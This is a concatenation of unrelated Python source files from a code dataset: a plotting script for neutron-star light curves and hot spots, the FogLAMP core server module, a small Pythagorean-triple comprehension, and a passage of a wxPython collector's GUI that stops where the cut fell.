3 columns. Depending on what's plotted, these are either:\n[time, energy, flux] or [x-position , y-position, intensity].\n'''\n\n# # load global variables from definitions.h\n# with open(\"../FullNS/definitions.h\") as f:\n# content = f.readlines()\n# # you may also want to remove whitespace characters like `\\n` at the end of each line\n# content = [x.strip() for x in content]\n# print(content)\n#\n\n# load the data from the output.dat file into 3 array columns:\nprint('loading data... ',end=\"\\r\")\nsourcefile = \"LC_1.50_11.0_ 12_090_075_0.35_0.0\"\nfilename = \"FINAL_PLOTS/FIG2-3_DipoleLightCurves/10Hz/\" + sourcefile + \".dat\"\ncolumn1,column2,column3 = np.loadtxt(filename,skiprows=0,unpack=True)\n# filename2 = \"FINAL_PLOTS/FIG8_QDLightCurve/80-60/HS_80-60-1.5_data/\" + sourcefile + \".dat\"\n# mov1,mov2,mov3 = np.loadtxt(filename2,skiprows=0,unpack=True)\nprint('data imported.')\n\nNt = 64 #NB: One less than the input in definitions (default 64)\nNen = 126 #NB: Two less than the input in definitions (default 126)\n\n###############################################################################\n\n\ndef temp_contours(): #FIGURE 7\n '''contour plot of the temperature ratio between the two hemispheres.\n Data from jtemp.c. For Figure 7 in the paper. '''\n\n Qlist = np.linspace(0,2,21)\n Zlist = np.linspace(0,90,46) #NB: these are hard-coded\n Z,Q = np.meshgrid(Zlist,Qlist)\n T = column3[0:21*46]\n grid = T.reshape((21, 46))\n\n levels = [1.0,1.1,1.2,1.3,1.4,1.5,1.6,1.7,1.8,1.9,2.0]\n cplot = plt.contour(Q,Z,grid,levels, colors='k')\n # plt.clabel(cplot, fmt = '%2.1f',inline=True, fontsize=11)\n cfplot = plt.contourf(Q,Z,grid,levels, cmap=\"Blues\")\n cbar=plt.colorbar(cfplot)\n cbar.set_label(r'$T_1 / T_2$',rotation=270, fontsize=12, labelpad=16)\n plt.xlabel('q')\n plt.ylabel(r'$\\zeta$ (degrees)')\n plt.show()\n\n\ndef plotPP():\n '''plot the total flux across all energy bands versus phase'''\n time_data,total_flux = column1,column3\n plt.plot(time_data,total_flux)\n plt.show()\n\n\ndef plotLightCurve(e):\n '''plot flux versus time at a given energy: I(t)|e '''\n\n # grab all the flux-time data for a given photon energy.\n # e.g. if Nen=128, we want data[e,128+e,256+e,384+e...]\n print('plotting light curve...')\n time_data,energy_data,flux_data = column1,column2,column3\n # we want to plot flux versus time _at a given energy_\n energy_value = energy_data[e]\n time_values = []\n flux_values = []\n for t in range(0,Nt-1):\n time_values.append(column1[Nen*t + e])\n flux_values.append(column3[Nen*t + e])\n plt.plot(time_values,flux_values)\n plt.title('energy = ' + str(energy_value) + ' KeV')\n plt.xlabel('Phase'); plt.ylabel('Flux (photons/cm^2/s/keV)')\n plt.show()\n\n\ndef plotPulseProfile():\n '''plot the total flux across all energy bands versus phase'''\n\n x1 = np.append(column1,1);\n y1 = np.append(column3,column3[0]) #repeat first value no there's no space\n # peaks = calcPeakData(y1)\n # time_data = x1\n # flux_data = y1\n\n time_data = np.append(x1,x1+1) #plot two periods\n flux_data = np.append(y1,y1)\n\n average_flux = np.sum(column3)/len(column3)\n flux_data *= 1/(average_flux) #normalize\n\n # amp = round(np.max(total_flux)/np.min(total_flux),2)\n plt.plot(time_data,flux_data,linewidth=2.2,color='#6B4C9A')#,label='Amplitude = '+str(amp))\n\n plt.xlim(0,2)\n # plt.ylim(0.5,1.5)\n plt.ylim(0,np.max(flux_data)*1.1)\n # plt.axes().set_aspect(1.1) #for FIG9\n # plt.set_xticks([0,0.5,1,1.5,2])\n # plt.set_yticks([0.5,0.75,1,1.25,1.5])\n plt.tick_params(direction='in')\n plt.axvline(x=1,color='gray',linestyle='dashed',linewidth=1)\n # plt.title(sourcefile)\n plt.xlabel('Phase')\n # plt.ylabel('Total Flux (photons/cm^2/s)')\n plt.ylabel('Normalized Flux')\n # for p in peaks:\n # plt.axvline(x=p/Nt,color='green',linewidth=0.75)\n # plt.axvline(x=1+(p/Nt),color='green',linewidth=0.75)\n # plt.plot(p/Nt,total_flux[p],color='red',marker='o',markersize=2.5)\n # if len(peaks) == 2:\n # t1 = peaks[0]; t2 = peaks[1]\n # A = max(column3[t1],column3[t2])/min(column3[t1],column3[t2]) #ratio of two peaks\n # plt.title(r'$\\Delta \\phi$ = ' + str(round(phase_shift,2)) + '; $A_1/A_2$ = ' + str(round(A,2)),color='green', fontsize=14)\n # plt.legend(loc=4)\n plt.show()\n\n\n\ndef calcPeakData(flux_data):\n '''returns the phase shift and amplitude difference of the two peaks'''\n\n print('spread = ' , str(round(np.max(flux_data)/np.min(flux_data),3)) )\n peaks = []\n for t in range(Nt):\n #it's a local peak if it's bigger than its neighbors. Note the mod (%)\n if (flux_data[t]>flux_data[(t-1)%Nt]) and (flux_data[t]>flux_data[(t+1)%Nt]):\n peaks.append(t)\n if len(peaks) == 2:\n t1 = peaks[0]; t2 = peaks[1]\n peaktopeak = flux_data[t1] / flux_data[t2]\n phase_shift = abs((t1-t2)/Nt)\n if phase_shift > 0.5: #the real phase shift can't exceed 180º=0.5, if we wrap around\n phase_shift = 1-phase_shift\n print('phase shift = ' + str(round(phase_shift,3)) + ', peak-to-peak ratio = ' + str(round(peaktopeak,3)))\n elif len(peaks) == 1:\n print('only 1 peak detected: amplitude = ' + str(round(flux_data[peaks[0]],2)) +\n ', phase = ' + str(round(peaks[0]/Nt,2)))\n else: print('more than two peaks detected!')\n return peaks\n\n\n# def ppp(filename,spotsize):\n# c1,c2,c3 = np.loadtxt(filename,unpack=True)\n# data = (c1,c3*(50/spotsize)**2) # note, power is ** not ^\n# return data\n#\n# def michi():\n# '''flux scaled by (50º/pho)^2 to reproduce the plots in Michi's paper'''\n#\n# fig = plt.figure(figsize=(12,5))\n# plt.subplot(1,2,1)\n# x,y = ppp(\"outputs/output_PP_m_50a.dat\",50); plt.plot(x,y,label=\"rho=50\")\n# x,y = ppp(\"outputs/output_PP_m_25a.dat\",25); plt.plot(x,y,label=\"rho=25\")\n# x,y = ppp(\"outputs/output_PP_m_10a.dat\",10); plt.plot(x,y,label=\"rho=10\")\n# # x,y = ppp(\"outputs/output_PP_m_2a.dat\",2); plt.plot(x,y,label=\"rho=2\")\n# plt.xlabel('Energy (keV)'); plt.ylabel('Scaled Flux (photons/cm^2/s/keV)')\n# plt.title('Pulse Profiles for i=90º, theta_s=80º')\n# plt.ylim(-10,400)\n# plt.legend()\n# plt.subplot(1,2,2)\n# x,y = ppp(\"outputs/output_PP_m_50b.dat\",50); plt.plot(x,y,label=\"rho=50\")\n# x,y = ppp(\"outputs/output_PP_m_25b.dat\",25); plt.plot(x,y,label=\"rho=25\")\n# x,y = ppp(\"outputs/output_PP_m_10b.dat\",10); plt.plot(x,y,label=\"rho=10\")\n# # x,y = ppp(\"outputs/output_PP_m_2b.dat\",2); plt.plot(x,y,label=\"rho=2\")\n# plt.xlabel('Phase'); plt.ylabel('Scaled Flux (photons/cm^2/s/keV)')\n# plt.title('Pulse Profiles for i=70º, theta_s=40º')\n# plt.ylim(-10,400)\n# plt.legend()\n# plt.show()\n\n###############################################################################\n\n\ndef plotSpectrum(t):\n '''plot flux versus energy at a given time: I(e)|t '''\n\n #grab all the flux-energy data for a given phase (time)\n time_data,energy_data,flux_data = column1,column2,column3\n N = int(len(flux_data)/Nt) # N is the number of data points per time slice\n x = energy_data[N*t: N*(t+1)]\n y = flux_data[N*t: N*(t+1)]\n plt.plot(x,y)\n plt.title('phase = ' + str(t) + '/' + str(Nt))\n plt.xlabel('Energy (keV)'); plt.ylabel('Flux (photons/cm^2/s/keV)')\n # plt.legend()\n plt.show()\n\n\n# def plotSpectra():\n# '''plot several spectra together on the same graph '''\n#\n# times = (0,4,8,12,16)\n# for t in times:\n# x,y = getSpectrum(t)\n# plt.plot(x,y,label=t)\n# # plt.title('phase = ' + str(t))\n# plt.xlabel('Energy (keV)'); plt.ylabel('Flux (photons/cm^2/s/keV)')\n# plt.legend()\n# plt.show()\n\n\n###############################################################################\n\n\ndef plotHotSpot():\n print('plotting hot spot...')\n myplot = plotHS(mov1,mov2,mov3)\n # max_value = np.max(mov3); min_value = np.min(mov3)\n # rangeI = max(max_value**2, min_value**2)**(1/2)\n # plt.scatter(mov1,mov2,c=mov3,cmap=cm.seismic,vmin=-rangeI,vmax=rangeI,s=0.3)\n # plt.colorbar()\n radius = 6.45 #NB:hard-coded, need to double-check each time! Here use xlim=ylim=7.5\n # radius = 7.25 #NB:hard-coded, need to double-check each time! Here use xlim=ylim=8.43\n circle1=plt.Circle((0,0),radius,color='black',fill=False)\n plt.axes().add_artist(circle1)\n plt.show()\n\n\ndef plotHS(x_pos,y_pos,intensity):\n x = np.array(x_pos)\n y = np.array(y_pos)\n I = np.array(intensity)\n max_value = np.max(I); min_value = np.min(I)\n print('max_value='+str(max_value),'min_value='+str(min_value))\n rangeI = max(max_value**2, min_value**2)**(1/2)\n frm = plt.scatter(x,y,marker=\",\",c=I,cmap=cm.gist_heat,vmin=0,vmax=max_value,s=0.2)#vmin=-rangeI,vmax=rangeI,s=0.3)\n #set vmin=0 for positive-only, vmin=-rangeI for total J^2 plots\n plt.xlim(-7.5,7.5)\n plt.ylim(-7.5,7.5)\n plt.axes().set_aspect('equal')\n # plt.axis('off')\n plt.xticks([]); plt.yticks([]) #box but no tick marks\n plt.axhline(y=7.5,linewidth=3, color=\"gray\")\n plt.axhline(y=-7.5,linewidth=3, color=\"gray\") # inc. width of x-axis and color it green\n plt.axvline(x=7.5,linewidth=3, color=\"gray\") # inc. width of x-axis and color it green\n plt.axvline(x=-7.5,linewidth=3, color=\"gray\") # inc. width of x-axis and color it green\n return frm\n\n\n# def makeVideo():\n# '''create a video of the hotspot as the star rotates'''\n#\n# num_periods = 1\n# x_pos,y_pos,intensity = mov1,mov2,mov3\n# fig = plt.figure()\n# movie_frames = []\n# N = int(len(intensity)/Nt) # N is the number of data points per time slice\n# print('creating video frames...')\n# for cycle in range(num_periods):\n# for t in range(Nt):\n# print('t = ' + str(t+1) + '/' + str(Nt),end='\\r')\n# # separate the data by time slice and plot\n# newframe = plotHS(x_pos[N*t:N*(t+1)],y_pos[N*t:N*(t+1)],intensity[N*t:N*(t+1)])\n# movie_frames.append([newframe])\n# ani = animation.ArtistAnimation(fig, movie_frames, interval=150, blit=True, repeat_delay=1000)\n# print('saving video...')\n# videoname = filename + '.mp4'\n# ani.save(videoname)\n# print('complete.')\n# # plt.show()\n\n\n# import matplotlib.gridspec as gridspec\n# figgy = plt.figure(figsize=(8,8))\n# gs = gridspec.GridSpec(2,1,height_ratios=[2,1.2])\n# ax2 = plt.subplot(gs[0])\n# ax1 = plt.subplot(gs[1])\n# N = int(len(mov3)/Nt)\n# # peaks = calcPeakData(column3)\n\ndef animate(i):\n print('creating frame ' + str(i) + ' ... ', end=\"\\r\")\n t = i%Nt\n ax1.clear()\n ax2.clear()\n\n #PLOT1: pulse profile\n ax1.plot(column1,column3)\n ax1.axvline(x=(t/Nt),color='red',linewidth=0.75)\n ax1.plot(t/Nt,column3[t],color='red',marker='o',markersize=2.5)\n #show peaks\n # for p in peaks: ax1.axvline(x=p/Nt,color='green',linewidth=0.5)\n # if len(peaks) == 2:\n # t1 = peaks[0]; t2 = peaks[1]\n # A = min(column3[t1],column3[t2])/max(column3[t1],column3[t2]) #ratio of the two peaks amplitudes\n # phase_shift = abs((t1-t2)/Nt)\n # #the real phase shift can't exceed 180º=0.5, if we wrap around\n # if phase_shift > 0.5: phase_shift = 1-phase_shift\n # # print('phase shift = ' + str(round(phase_shift,2)) + ', peak-to-peak = ' + str(round(peaktopeak,2)))\n # ax1.set_title(r'$\\Delta \\phi$ = ' + str(round(phase_shift,3)) + '; $A_1/A_2$ = ' + str(round(A,3)),color='green', fontsize=14)\n\n #PLOT2: hot spot\n x = mov1[N*t:N*(t+1)]\n y = mov2[N*t:N*(t+1)]\n I = mov3[N*t:N*(t+1)]\n max_value = np.max(mov3); min_value = np.min(mov3)\n rangeI = max(max_value**2, min_value**2)**(1/2)\n ax2.scatter(x,y,c=I,cmap=cm.seismic,vmin=-rangeI,vmax=rangeI,s=0.2)\n\n # draw the boundary of the star\n radius = 7.125 # NB: Hard-coding! depends on compactness etc\n #max(np.max(column1),-1*np.min(column1),np.max(column2),-1*np.min(column2))\n circle1=plt.Circle((0,0),radius,color='black',fill=False)\n ax2.add_artist(circle1)\n # gcf() means Get Current Figure; gca() means Get Current Axis\n\n # ax2.set_title(r'$\\theta_0 = 90$; $\\alpha = 30$; $q = 2.0$')\n\n #formatting\n ax2.set(aspect=1)\n ax2.xaxis.set_tick_params(size=0)\n ax2.yaxis.set_tick_params(size=0)\n plt.setp(ax2.get_xticklabels(), visible=False)\n plt.setp(ax2.get_yticklabels(), visible=False)\n ax1.set_xlim([0, 1-(1/Nt)])\n ax1.set_xlabel('Phase'); ax1.set_ylabel('Total Flux (photons/cm^2/s)')\n\n\ndef fullVideo():\n num_cycles = 1\n ani = animation.FuncAnimation(\n figgy, animate, frames=num_cycles*Nt, interval=150, blit=False, repeat=False)\n writer = FFMpegWriter(fps=15) #, bitrate=1800)\n movfile = sourcefile + \".mp4\"\n ani.save(\"FINALRUNS/\" + movfile, writer=writer)\n print('\\n video complete.')\n # plt.show()\n\n\n# ###############################################################################\n\n# fullVideo()\nplotPulseProfile()\n# plotHotSpot()\n# temp_contours()\n","sub_path":"lightcurves.py","file_name":"lightcurves.py","file_ext":"py","file_size_in_byte":13472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"588389456","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# FOGLAMP_BEGIN\n# See: http://foglamp.readthedocs.io/\n# FOGLAMP_END\n\n\"\"\"Core server module\"\"\"\n\nimport asyncio\nimport os\nimport subprocess\nimport sys\nimport http.client\nimport json\nfrom aiohttp import web\n\nfrom foglamp.common import logger\nfrom foglamp.services.core import routes as admin_routes\nfrom foglamp.services.common.microservice_management import routes as management_routes\nfrom foglamp.common.web import middleware\nfrom foglamp.services.common.microservice_management.service_registry.instance import Service\nfrom foglamp.services.core.scheduler.scheduler import Scheduler\nfrom foglamp.services.common.microservice_management.service_registry.monitor import Monitor\n\n__author__ = \"Amarendra K. Sinha, Praveen Garg, Terris Linenbach\"\n__copyright__ = \"Copyright (c) 2017 OSIsoft, LLC\"\n__license__ = \"Apache 2.0\"\n__version__ = \"${VERSION}\"\n\n_logger = logger.setup(__name__, level=20)\n\n# FOGLAMP_ROOT env variable\n_FOGLAMP_ROOT= os.getenv(\"FOGLAMP_ROOT\", default='/usr/local/foglamp')\n_SCRIPTS_DIR= os.path.expanduser(_FOGLAMP_ROOT + '/scripts')\n\n\nclass Server:\n \"\"\" FOGLamp core server.\n\n Starts the FogLAMP REST server, storage and scheduler\n \"\"\"\n\n scheduler = None\n \"\"\" foglamp.core.Scheduler \"\"\"\n\n service_monitor = None\n \"\"\" foglamp.microservice_management.service_registry.Monitor \"\"\"\n\n _host = '0.0.0.0'\n core_management_port = 0\n\n # TODO: FOGL-655 Get Admin API port from configuration option\n rest_service_port = 8081\n\n @staticmethod\n def _make_app():\n \"\"\"Creates the REST server\n\n :rtype: web.Application\n \"\"\"\n app = web.Application(middlewares=[middleware.error_middleware])\n admin_routes.setup(app)\n return app\n\n @staticmethod\n def _make_core_app():\n \"\"\"Creates the Service management REST server Core a.k.a. service registry\n\n :rtype: web.Application\n \"\"\"\n app = web.Application(middlewares=[middleware.error_middleware])\n management_routes.setup(app, is_core=True)\n return app\n\n @classmethod\n async def _start_service_monitor(cls):\n \"\"\"Starts the microservice monitor\"\"\"\n cls.service_monitor = Monitor()\n await cls.service_monitor.start()\n\n @classmethod\n async def _start_scheduler(cls):\n \"\"\"Starts the scheduler\"\"\"\n _logger.info(\"start scheduler\")\n cls.scheduler = Scheduler(cls._host, cls.core_management_port)\n await cls.scheduler.start()\n\n @staticmethod\n def __start_storage(host, m_port):\n _logger.info(\"start storage, from directory %s\", _SCRIPTS_DIR)\n try:\n cmd_with_args = ['./services/storage', '--address={}'.format(host),\n '--port={}'.format(m_port)]\n subprocess.call(cmd_with_args, cwd=_SCRIPTS_DIR)\n except Exception as ex:\n _logger.exception(str(ex))\n\n @classmethod\n async def _start_storage(cls, loop):\n if loop is None:\n loop = asyncio.get_event_loop()\n # callback with args\n loop.call_soon(cls.__start_storage, cls._host, cls.core_management_port)\n\n @classmethod\n def _start_app(cls, loop, app, host, port):\n if loop is None:\n loop = asyncio.get_event_loop()\n\n handler = app.make_handler()\n coro = loop.create_server(handler, host, port)\n # added coroutine\n server = loop.run_until_complete(coro)\n return server, handler\n\n @classmethod\n def _start_core(cls, loop=None):\n _logger.info(\"start core\")\n\n try:\n host = cls._host\n\n core_app = cls._make_core_app()\n core_server, core_server_handler = cls._start_app(loop, core_app, host, 0)\n address, cls.core_management_port = core_server.sockets[0].getsockname()\n _logger.info('Management API started on http://%s:%s', address, cls.core_management_port)\n # see http://:/foglamp/service for registered services\n\n # start storage\n loop.run_until_complete(cls._start_storage(loop))\n # start scheduler\n # see scheduler.py start def FIXME\n # scheduler on start will wait for storage service registration\n loop.run_until_complete(cls._start_scheduler())\n\n # start monitor\n loop.run_until_complete(cls._start_service_monitor())\n\n service_app = cls._make_app()\n service_server, service_server_handler = cls._start_app(loop, service_app, host, cls.rest_service_port)\n address, service_server_port = service_server.sockets[0].getsockname()\n _logger.info('Rest Server started on http://%s:%s', address, service_server_port)\n\n # register core\n # a service with 2 web server instance,\n # registering now only when service_port is ready to listen the request\n cls._register_core(host, cls.core_management_port, cls.rest_service_port)\n print(\"(Press CTRL+C to quit)\")\n\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n finally:\n # graceful-shutdown\n # http://aiohttp.readthedocs.io/en/stable/web.html\n # TODO: FOGL-653 shutdown implementation\n # stop the scheduler\n loop.run_until_complete(cls._stop_scheduler())\n\n # stop the REST api (exposed on service port)\n service_server.close()\n loop.run_until_complete(service_server.wait_closed())\n loop.run_until_complete(service_app.shutdown())\n loop.run_until_complete(service_server_handler.shutdown(60.0))\n loop.run_until_complete(service_app.cleanup())\n\n # stop storage\n cls.stop_storage()\n\n # stop core management api\n core_server.close()\n loop.run_until_complete(core_server.wait_closed())\n loop.run_until_complete(core_app.shutdown())\n loop.run_until_complete(core_server_handler.shutdown(60.0))\n loop.run_until_complete(core_app.cleanup())\n\n loop.close()\n except (OSError, RuntimeError, TimeoutError) as e:\n sys.stderr.write('Error: ' + format(str(e)) + \"\\n\")\n sys.exit(1)\n except Exception as e:\n sys.stderr.write('Error: ' + format(str(e)) + \"\\n\")\n sys.exit(1)\n\n @classmethod\n def _register_core(cls, host, mgt_port, service_port):\n core_service_id = Service.Instances.register(name=\"FogLAMP Core\", s_type=\"Core\", address=host,\n port=service_port, management_port=mgt_port)\n\n return core_service_id\n\n @classmethod\n def start(cls):\n \"\"\"Starts the server\"\"\"\n\n loop = asyncio.get_event_loop()\n cls._start_core(loop=loop)\n\n @classmethod\n def stop_storage(cls):\n \"\"\" stop Storage service \"\"\"\n\n # TODO: FOGL-653 shutdown implementation\n # remove me, and allow this call in service registry API\n\n found_services = Service.Instances.get(name=\"FogLAMP Storage\")\n svc = found_services[0]\n if svc is None:\n return\n\n management_api_url = '{}:{}'.format(svc._address, svc._management_port)\n\n conn = http.client.HTTPConnection(management_api_url)\n # TODO: need to set http / https based on service protocol\n\n conn.request('POST', url='/foglamp/service/shutdown', body=None)\n r = conn.getresponse()\n\n # TODO: FOGL-615\n # log error with message if status is 4xx or 5xx\n if r.status in range(400, 500):\n _logger.error(\"Client error code: %d\", r.status)\n if r.status in range(500, 600):\n _logger.error(\"Server error code: %d\", r.status)\n\n res = r.read().decode()\n conn.close()\n return json.loads(res)\n\n @classmethod\n async def _stop_scheduler(cls):\n if cls.scheduler:\n try:\n await cls.scheduler.stop()\n cls.scheduler = None\n except TimeoutError:\n _logger.exception('Unable to stop the scheduler')\n return\n\n\ndef main():\n \"\"\" Processes command-line arguments\n COMMAND LINE ARGUMENTS:\n - start\n - stop\n\n :raises ValueError: Invalid or missing arguments provided\n \"\"\"\n\n if len(sys.argv) == 1:\n raise ValueError(\"Usage: start|stop\")\n elif len(sys.argv) == 2:\n command = sys.argv[1]\n if command == 'start':\n Server().start()\n elif command == 'stop':\n Server().stop_storage()\n # scheduler has signal binding\n else:\n raise ValueError(\"Unknown argument: {}\".format(sys.argv[1]))\n","sub_path":"python/foglamp/services/core/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":8940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"578069786","text":"\n\n\"\"\"\nCreated on Wed Feb 10 15:04:43 2020\n@author: 10\n\"\"\"\n\ndef rightTriangle (max):\n\n rightTriangle = [(a, b, c)\n#Expression\n for c in range (1, 11)\n for a in range (1, c)\n for b in range (1, a)\n\n if a**2 + b**2 == c**2 and a + b + c == 24]\n#valeur\n\n return rightTriangle\nprint (rightTriangle(24))\n\n\n\n\n","sub_path":"C.Comprehensions/b300117314.py","file_name":"b300117314.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"95732343","text":"# -*- coding: utf-8 -*-\n\nimport wx\nimport wx.lib.agw.hypertreelist as HTL\nimport wx.lib.mixins.listctrl as listmix\nimport wx.grid as gridlib\nimport sys\nimport os\nimport configobj\nfrom math import ceil\n\nimport menues\nimport settings\nfrom preferences.frames import PreferencesDialog\nfrom lib.ui import PersistentFrame\nimport resources\n\n_ = wx.GetTranslation\n\nclass MainFrame(PersistentFrame):\n def __init__(self, parent, id=wx.ID_ANY, title=\"\", pos=wx.DefaultPosition, size=(800, 600), style=wx.DEFAULT_FRAME_STYLE, name='MainFrame'):\n super(MainFrame, self).__init__(parent, id, title, pos, size, style, name)\n \n self.SetMinSize((800, 600))\n self.navigation = NavigationPanel(self)\n self.view_panel = ViewPanel(self)\n menues.MainMenu(self)\n\n self.__DoLayout()\n self.__EventHandlers()\n \n def OnExit(self, event):\n self.Close()\n \n def __OnResize(self, event):\n if self.view_panel.mode in menues.GALLERIES:\n self.view_panel.Freeze()\n width = self.ClientSize[0] - self.navigation.MinWidth \n newcols = width / self.view_panel.item_size\n if newcols != self.view_panel.gallery.cols_best_amount:\n self.view_panel.gallery.cols_best_amount = newcols\n self.view_panel.gallery.Reset() \n self.view_panel.WidthCorrection()\n self.view_panel.Thaw()\n else:\n width = self.ClientSize[0] - self.navigation.MinWidth \n self.view_panel.SetSizeHints(width, self.ClientSize[1])\n event.Skip()\n\n def OnAbout(self, event):\n info = wx.AboutDialogInfo()\n desc = [\"\\n{0}\\n\".format(_(\"A program for collectors!\")),\n \"{0}: (%s, %s)\".format(_(\"Platform Info\")),\n \"{0}: {1}\".format(_(\"License\"), \"LGPL\")]\n desc = \"\\n\".join(desc)\n py_version = [sys.platform, \", python \", sys.version.split()[0]]\n py_version = \"\".join(py_version)\n platform = list(wx.PlatformInfo[1:])\n platform[0] += (\" \" + wx.VERSION_STRING)\n wx_info = \", \".join(platform)\n info.SetName(_(\"Caps Navigator\"))\n info.SetVersion(\"4.0.0\")\n info.SetCopyright(\"{0} (C) {1}\".format(_(\"Copyright\"), _(\"Art Zhitnik\")))\n info.SetDescription(desc % (py_version, wx_info))\n wx.AboutBox(info)\n \n def OnPreferences(self, event):\n preferences = PreferencesDialog(self)\n preferences.CenterOnParent() \n preferences.ShowModal() \n \n def __OnClose(self, event):\n self.config['frames']['mainframe_view_mode'] = self.view_panel.mode \n event.Skip()\n \n def __EventHandlers(self):\n self.Bind(wx.EVT_MENU, self.OnExit, id=wx.ID_EXIT)\n self.Bind(wx.EVT_MENU, self.OnPreferences, id=wx.ID_PREFERENCES) \n self.Bind(wx.EVT_MENU, self.OnAbout, id=wx.ID_ABOUT) \n self.Bind(wx.EVT_SIZE, self.__OnResize)\n self.Bind(wx.EVT_CLOSE, self.__OnClose) \n \n def __DoLayout(self):\n hsizer = wx.BoxSizer(wx.HORIZONTAL)\n hsizer.Add(self.navigation, 1, wx.EXPAND)\n hsizer.Add(self.view_panel, 0) \n self.SetSizer(hsizer)\n \nclass NavigationPanel(wx.Panel):\n def __init__(self, parent):\n super(NavigationPanel, self).__init__(parent) \n \n self.SetMinSize((200, 0)) \n \n self.__MakeControls()\n self.__DoLayout()\n self.__EventHandlers() \n \n def __OnToolbarPushed(self, event): \n if event.GetId() == menues.ID_FILTER: \n panelparent = self.tree.GetParent()\n panelsizer = panelparent.GetSizer()\n panelparent.Freeze() \n panelsizer.Detach(self.tree)\n self.tree.Destroy()\n del self.tree\n self.tree = MainTree(self, check_boxes=event.Checked())\n panelsizer.Add(self.tree, 1, wx.EXPAND)\n panelsizer.Layout() \n panelparent.Thaw() \n \n event.Skip()\n \n def __MakeControls(self):\n self.toolbar = menues.MainTreeToolbar(self)\n self.tree = MainTree(self)\n \n def __DoLayout(self):\n hsizer = wx.BoxSizer(wx.VERTICAL)\n hsizer.Add(self.toolbar, 0, wx.EXPAND) \n hsizer.AddSpacer(3)\n hsizer.Add(self.tree, 1, wx.EXPAND) \n self.SetSizer(hsizer)\n \n def __EventHandlers(self):\n self.Bind(wx.EVT_TOOL, self.__OnToolbarPushed)\n \nclass MainTree(HTL.HyperTreeList): \n def __init__(self, parent, id=wx.ID_ANY, pos=wx.DefaultPosition, size=wx.DefaultSize, style=wx.NO_BORDER,\\\n agwStyle=wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.TR_HIDE_ROOT | HTL.TR_NO_HEADER,\\\n log=None, check_boxes=False):\n HTL.HyperTreeList.__init__(self, parent, id, pos, size, style, agwStyle)\n \n self.__SetupExtraStyle()\n self.__EventHandlers() \n \n self.AddColumn(\"Main column\")\n self.AddColumn(\"Amount\", flag=wx.ALIGN_CENTER)\n self.SetMainColumn(0)\n \n _program_dir = os.path.split(__file__)[0] \n il = wx.ImageList(24, 16)\n il.Add(wx.Bitmap(os.path.join(_program_dir, '../design/rus24x16.png'), wx.BITMAP_TYPE_PNG))\n il.Add(wx.Bitmap(os.path.join(_program_dir, '../design/ukr24x16.png'), wx.BITMAP_TYPE_PNG))\n self.AssignImageList(il) \n \n self.root = self.AddRoot(\"Root\") \n self.locations = self.AppendItem(self.root, _(\"Location\"))\n self.ct_type = check_boxes and 1 or 0\n \n self.AddCountry(self.locations, \"Russia\", 0) \n self.AddCountry(self.locations, \"Ukraine\", 1)\n self.AddCountry(self.locations, \"Unknown\") \n \n self.SelectItem(self.locations)\n self.Expand(self.locations)\n \n def AddCountry(self, node, text, flag=None):\n item = self.AppendItem(node, text, ct_type=self.ct_type)\n if flag is not None: \n self.SetItemImage(item, flag, which=wx.TreeItemIcon_Normal)\n \n def __OnResize(self, event): \n width = self.Parent.GetSize()[0] - 3\n column0_new_width = width * 0.8\n column1_new_width = width * 0.2\n if column1_new_width != self.GetColumnWidth(0):\n self.SetColumnWidth(0, column0_new_width)\n self.SetColumnWidth(1, column1_new_width)\n event.Skip()\n \n def __SetupExtraStyle(self):\n self.SetBuffered(True)\n self.SetBackgroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOW))\n\n def __EventHandlers(self):\n self.Bind(wx.EVT_SIZE, self.__OnResize)\n \nclass ViewPanel(wx.Panel):\n def __init__(self, parent):\n super(ViewPanel, self).__init__(parent, style=wx.NO_FULL_REPAINT_ON_RESIZE) \n \n config_path = wx.StandardPaths_Get().GetUserDataDir()\n self.mode = int(parent.config['frames'].get('mainframe_view_mode', menues.ID_SMALL_VIEW))\n self.item_size = settings.ITEM_SIZES.get(self.mode, 0)\n \n self.__MakeControls()\n self.__DoLayout()\n self.__EventHandlers() \n \n def WidthCorrection(self):\n \"\"\"\n Correct panel width according to appearance of the vertical scroll bar of the gallery.\n Dirty hack, but gallery.HasScrollbar() doesn't work.\n \"\"\"\n _galleryrows_forecast = float(self.Parent.ClientSize[1] - self.toolbar.Size[1] - 2) / self.item_size\n if _galleryrows_forecast < self.gallery.table.rows:\n _scrollbar_correction = wx.SystemSettings.GetMetric(wx.SYS_VSCROLL_X)\n else:\n _scrollbar_correction = 0\n self.SetSizeHints(self.gallery.cols_best_amount * self.item_size + _scrollbar_correction + 3, self.Parent.ClientSize[1]) \n \n def __OnToolbarPushed(self, event):\n evt_id = event.GetId()\n self.Freeze()\n self._vsizer = self.GetSizer()\n if self.mode in menues.GALLERIES:\n self._vsizer.Detach(self.gallery) \n self.gallery.Destroy() \n del self.gallery\n elif self.mode == menues.ID_LIST_VIEW:\n self._vsizer.Detach(self.list_view) \n self.list_view.Destroy() \n del self.list_view \n self.mode = evt_id\n if settings.ITEM_SIZES.has_key(evt_id): \n self.item_size = settings.ITEM_SIZES[evt_id]\n self.gallery = GallaryView(self, self.item_size) \n self._vsizer.Add(self.gallery, 1, wx.EXPAND) \n self._vsizer.Layout() \n self.gallery.Reset() \n self.WidthCorrection()\n elif evt_id == menues.ID_LIST_VIEW:\n self.list_view = ListView(self)\n self._vsizer.Add(self.list_view, 1, wx.EXPAND) \n self._vsizer.Layout() \n self.Parent.Sizer.Layout() \n self.Thaw()\n event.Skip()\n \n def __MakeControls(self):\n self.toolbar = menues.MainViewToolbar(self, self.mode)\n if self.mode in menues.GALLERIES:\n self.gallery = GallaryView(self, self.item_size)\n else:\n self.list_view = ListView(self) \n \n def __DoLayout(self):\n self._vsizer = wx.BoxSizer(wx.VERTICAL)\n self._vsizer.Add(self.toolbar, 0, wx.EXPAND) \n self._vsizer.AddSpacer(3) \n _current_view_control = hasattr(self, 'gallery') and self.gallery or self.list_view \n self._vsizer.Add(_current_view_control, 1, wx.EXPAND) \n 